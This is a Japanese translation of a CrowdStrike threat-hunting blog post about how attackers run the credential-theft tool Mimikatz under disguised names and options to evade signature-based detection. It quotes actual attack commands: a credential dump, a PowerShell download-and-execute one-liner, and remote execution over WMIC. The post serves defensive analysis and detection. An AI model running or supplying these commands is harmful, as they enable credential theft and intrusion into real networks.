CrowdStrike Blog:「サイバー界のAK47」、Mimikatzを利用したシグネチャベースの検知回避
今回は、オープンソースツールのMimikatzが攻撃者にどのように利用されているかについて、CrowdStrike Falcon OverWatchチームが確認した例をいくつかご紹介します。
国際
OverWatchチームは、お客様のインフラストラクチャに対して試みられた攻撃を総合的に可視化しています。この可視化は多岐にわたるお客様の業種・規模を網羅しています。OverWatchチームは、Falconエンドポイントセキュリティプラットフォームが提供するシステムの可視化を用いて、悪意のあるアクティビティを広範囲に観測しています。
権限昇格に使用する認証情報へのアクセス
悪意のあるアクティビティでよく見られるのが、認証情報へのアクセスです。多くの場合、攻撃者は権限を昇格してインフラストラクチャ内のアクセス可能な領域を広げるために、さまざまな手段を使って有効な認証情報を探します。OverWatchチームは、攻撃者が標的とした1人のユーザーに対して、認証情報を盗み取るために複数の手法を用いていたケースを確認しています(認証情報の窃取を狙った悪意のあるアクティビティで複数の手法が使用された例は、「2018年版 Falcon OverWatch Report」で紹介しています)。
Mimikatzの手法
認証情報にアクセスする一般的な方法に、Mimikatzの使用が挙げられます。CrowdStrikeの共同創業者で最高技術責任者(CTO)のDmitri Alperovitchは、Mimikatzを「サイバー界のAK47」と呼んでいます。OverWatchチームは、標的型攻撃とペネトレーションテスト(侵入テスト)のいずれにおいてもMimikatzが使われていることを頻繁に観測しています。
実行ファイル名の変更
Mimikatzを使用した最も単純で直接的な手法は、侵害したシステムにMimikatzをコピーし、実行ファイルの名前を変更し、以下のようなコマンドラインを使用して起動することです。
c:\ProgramData\p.exe ""privilege::debug""
""sekurlsa::logonpasswords""
これにより攻撃者は、システム上の認証情報にアクセスできるようになります。
バッチファイルの使用
Mimikatzを起動する別の方法でこれまでに確認されているものには、バッチファイルを使用して標的となるシステムにMimikatzをコピーし、それを起動してアウトプットをファイルに送信し、その出力ファイルを元の一元的な収集ポイントにコピーして、最後に標的となったシステムから関連ファイルをすべて削除する方法などがあります。
PowerShellの亜種を使用
OverWatchのアナリストがこれまでに確認した認証情報にアクセスするためのその他の方法には、次のような、Mimikatz用に改変したPowerShellを使用した例があります。
powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswordsexit'
コマンドラインオプションの変更
2018年第4四半期には、Mimikatzを使用した別の方法をOverWatchのアナリストが確認しています。具体的には、コマンドラインオプションを変更するように改変されたケースです。
mnl.exe pr::dg sl::lp et -p
このMimikatzの特定の亜種は、以下に示すように、標的とした複数のシステムに対してWMIC.exeを使用して実行されます。
Wmic /NODE:"[REDACTED]" /USER:"[REDACTED]" /password:[REDACTED] process call create "cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >>
c:\windows\temp\temp.txt"
IOAの監視が必須
これらの手法は明らかに実行ファイルのコマンドラインオプションを参照してその目的を推測したり、バイナリファイル内に関連する文字列が存在するかどうかを確認することだけに頼る脆弱な検知アプローチを回避することを狙ったものと言えます。攻撃者はさまざまな手法を使って認証情報にアクセスする可能性がありますが、Falconプラットフォームは、検知メカニズムを回避または妨害する目的で新しい手法が使用されている場合にも確認できる可視水準を提供します。
ファイル名、ハッシュ、単一のコマンドラインオプションなどの典型的な攻撃の痕跡(IOC)に注目するだけでなく、攻撃者の行動にフォーカスした攻撃の痕跡(IOA)を監視することの重要性が、さらに明らかになっています。
その他のリソース
・「2019 CrowdStrike Global Threat Report:Adversary Tradecraft and the Importance of Speed」をダウンロードしてご覧ください
・「2018年版 CrowdStrike Falcon OverWatch Report 脅威ハンティングの最前線」をダウンロードしてご覧ください
・CrowdStrikeの次世代アンチウイルス(AV)を実際にお試しいただけます。今すぐFalcon Preventの無料トライアル版をお試しください
*原文はCrowdStrike Blog サイト掲載 :https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/
関連リンク
編集部おすすめの記事
特集
CrowdStrike 事例と活動(クラウドストライク株式会社)
-
世界規模の障害発生 ~ CrowdStrike CEO ジョージ・カーツ 公式コメント
米CrowdStrike社 CEO ジョージ・カーツ氏は現地時間7月19日、…
-
Mandiant の IR サービスを Falcon から活用可、CrowdStrike と Google Cloud が戦略的提携拡大
-
セキュリティは愛か? 技術者が語る「レッドチーム演習でしかできないこと」
-
SBT、EDRのマネージドサービスにCrowdStrike Falcon追加
-
CrowdStrike Adversary Calender 2022 年 12 月
-
CrowdStrike Adversary Calender 2022 年 11 月「ラビリンス・チョリマ」
-
CrowdStrike「2022 年版Falcon OverWatch脅威ハンティング報告書」を公開
-
11/9 CrowdStrike CEO ジョージ・カーツ来日、楽天 福本氏 登壇 「サイバー攻撃者の世界 ワールドツアー」東京開催
国際 アクセスランキング
-
レッドチーム演習大成功 丸五か月間誰も気づけず
-
ランサムウェア集団が謝罪
-
[まさか本気でそんなに儲かると思った?]サイバー犯罪者さん 職種別給与一覧 ~ 求人広告22万件調査
-
国際手配のランサム犯 逮捕されずに世界中を旅行
-
Windows 10ではSafeDiscと特定バージョンのSecuROMのDRMシステムを利用した古いゲームがプレイ不可に、セキュリティホールとなる可能性を考慮
-
国連サイバー犯罪条約が「グローバル監視協定」になる危険性
-
支払額倍増の場合も ~ オラクルが Fortune 200 へ Java ライセンスに関する監査書送付を開始
-
資金力で警察に勝るサイバー犯罪集団とインターポールのプロジェクト
-
訃報「伝説のハッカー」ケビン・ミトニック氏 59歳
-
ウクライナの違法な仮想通貨のマイニング工場を摘発、PS4など3,800台のゲーム機を押収